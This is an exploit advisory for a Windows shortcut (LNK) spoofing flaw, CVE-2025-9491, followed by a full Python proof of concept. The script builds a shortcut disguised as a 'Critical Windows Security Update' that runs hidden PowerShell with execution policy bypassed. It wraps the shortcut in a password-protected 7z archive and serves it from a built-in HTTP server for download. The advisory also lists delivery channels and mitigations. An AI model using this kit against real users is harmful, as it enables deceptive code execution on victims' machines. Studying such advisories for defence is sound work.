# Title: Windows LNK File UI Misrepresentation Remote Code Execution
# Date: 2025-01-04
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://www.microsoft.com
# Software Link: N/A (Windows OS component)
# Version: Windows 10, Windows 11, Windows Server 2016/2019/2022
# Tested on: Windows 10 22H2, Windows 11 23H2
# CVE: CVE-2025-9491
# CVSS: 8.8

### Description:
A critical vulnerability exists in Microsoft Windows LNK file handling that allows attackers to create malicious shortcut files that appear legitimate in Windows Explorer while executing arbitrary commands. The vulnerability is a UI misrepresentation flaw in which Windows incorrectly displays file properties.

### Exploit:
[CVE-2025-9491.py](https://raw.githubusercontent.com/nu11secur1ty/Windows11Exploits/refs/heads/main/2025/CVE-2025-9491/Exploit/CVE-2025-9491.py)

### Technical Details:
The vulnerability allows attackers to craft LNK files with:
1. Legitimate-looking icons (document, PDF, Windows Update shield)
2. Misleading descriptions ("Security Update", "Important Document")
3. Hidden command execution in the arguments field
4. Window state set to hidden (SW_SHOWMINNOACTIVE = 7)

When a user opens the malicious LNK file, Windows Explorer shows it as a harmless document, but the file actually executes commands with the user's privileges. No security warnings are displayed to the user.

### Proof of Concept:
An LNK file can be created that:
- Shows as "Windows Security Update" with a shield icon
- Actually executes: cmd.exe /c powershell -Command "malicious_payload"
- Runs with a hidden window (WindowStyle = 7)

### Delivery: The LNK file can be delivered via:
1. Email attachments
2. Network shares
3. Web downloads
4. USB devices
5. Compressed archives

### Impact:
- Remote Code Execution with user privileges
- No user warnings or security prompts
- Complete UI deception
- Easy to weaponize

### Mitigation:
1. Enable display of file extensions in Windows Explorer
2. Block .LNK file attachments at email gateways
3. 
Implement application control (AppLocker, WDAC) 4. Monitor for hidden process execution 5. User education about suspicious files ### Vendor Status: Microsoft has been notified. No patch available as of 2025-01-04. References: - CVE-2025-9491 - Microsoft Security Response Center Note: This information is for defensive purposes only. Unauthorized testing against systems you don't own is illegal. -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty --- proof of concept --- #!/usr/bin/python # nu11secur1ty 2025 import os import sys import subprocess import socket import threading import pythoncom from win32com.client import Dispatch from http.server import HTTPServer, BaseHTTPRequestHandler def get_script_directory(): if getattr(sys, 'frozen', False): return os.path.dirname(sys.executable) else: return os.path.dirname(os.path.abspath(__file__)) def get_local_ip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.connect(('8.8.8.8', 80)) ip = s.getsockname()[0] except: ip = '0.0.0.0' finally: s.close() return ip def create_malicious_lnk(): script_dir = get_script_directory() lnk_path = os.path.join(script_dir, 'Critical_Update.lnk') print("[*] Creating malicious LNK file...") try: shell = Dispatch('WScript.Shell') shortcut = shell.CreateShortCut(lnk_path) shortcut.TargetPath = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command "Start-Process calc.exe; echo Windows Update Completed"' shortcut.WorkingDirectory = r'C:\Windows\System32' shortcut.Description = 'Critical Windows Security Update - KB5029244' icon_paths = [ r'C:\Windows\System32\shell32.dll', 
r'C:\Windows\System32\imageres.dll', ] for icon_path in icon_paths: if os.path.exists(icon_path): shortcut.IconLocation = f'{icon_path},78' break shortcut.WindowStyle = 7 shortcut.save() if os.path.exists(lnk_path): print(f"[+] LNK created: {lnk_path}") return lnk_path else: return None except Exception as e: print(f"[-] Error: {e}") return None def compress_with_7zip(lnk_path, password=None): if not lnk_path or not os.path.exists(lnk_path): print("[-] LNK file not found") return None seven_zip_paths = [ r'C:\Program Files\7-Zip\7z.exe', r'C:\Program Files (x86)\7-Zip\7z.exe', '7z.exe', '7z' ] seven_zip = None for path in seven_zip_paths: try: result = subprocess.run([path, '--help'], capture_output=True, text=True) if result.returncode == 0: seven_zip = path break except: continue if not seven_zip: print("[-] 7-Zip not found") return None archive_name = os.path.join(get_script_directory(), 'update.7z') cmd = [seven_zip, 'a', archive_name, lnk_path] if password: cmd.extend(['-p' + password]) cmd.extend(['-mx9', '-mhe=on', '-t7z']) print("[*] Compressing with 7-Zip...") try: result = subprocess.run(cmd, capture_output=True, text=True) if result.returncode == 0: print(f"[+] Archive created: {archive_name}") if password: print(f"[+] Password: {password}") return archive_name else: return None except Exception as e: print(f"[-] Compression failed: {e}") return None class FileHandler(BaseHTTPRequestHandler): def do_GET(self): if self.path == '/' or self.path == '/update.7z': file_path = 'update.7z' if os.path.exists(file_path): self.send_response(200) self.send_header('Content-type', 'application/x-7z-compressed') self.send_header('Content-Disposition', 'attachment; filename="update.7z"') with open(file_path, 'rb') as f: content = f.read() self.send_header('Content-Length', str(len(content))) self.end_headers() self.wfile.write(content) print(f"[+] CVE-2025-9491: Malicious LNK served to {self.client_address[0]}") else: self.send_error(404) else: self.send_error(404) def 
log_message(self, format, *args): pass def start_server(port=8080): ip = get_local_ip() print(f"[+] Starting server on http://{ip}:{port}") print(f"[+] Download URL: http://{ip}:{port}/update.7z") print("[+] Server running...") server = HTTPServer((ip, port), FileHandler) server.serve_forever() def main(): print("=" * 60) print("CVE-2025-9491 LNK Exploit + 7-Zip + HTTP Server") print("=" * 60) try: from win32com.client import Dispatch except ImportError: print("[-] Install pywin32: pip install pywin32") return # Create LNK lnk_file = create_malicious_lnk() if not lnk_file: print("[-] Failed to create LNK") return # Compress with 7-Zip print("\n[*] Compress with 7-Zip? (y/n): ", end='') compress = input().lower().strip() if compress == 'y': print("[*] Password (optional): ", end='') password = input().strip() if not password: password = None archive = compress_with_7zip(lnk_file, password) if archive: print(f"\n[+] Archive ready: {archive}") # Start HTTP server in background thread server_thread = threading.Thread(target=start_server, daemon=True) server_thread.start() ip = get_local_ip() print(f"\n[+] Server started at http://{ip}:8080") print(f"[+] Download: http://{ip}:8080/update.7z") print("\n[+] PowerShell download command:") print(f' iwr http://{ip}:8080/update.7z -OutFile update.7z') # Keep main thread alive try: while True: time.sleep(1) except KeyboardInterrupt: print("\n[*] Shutting down...") else: print("[-] Compression failed") print(f"[*] Use raw LNK: {lnk_file}") else: print(f"\n[*] Raw LNK file: {lnk_file}") if __name__ == "__main__": import time main()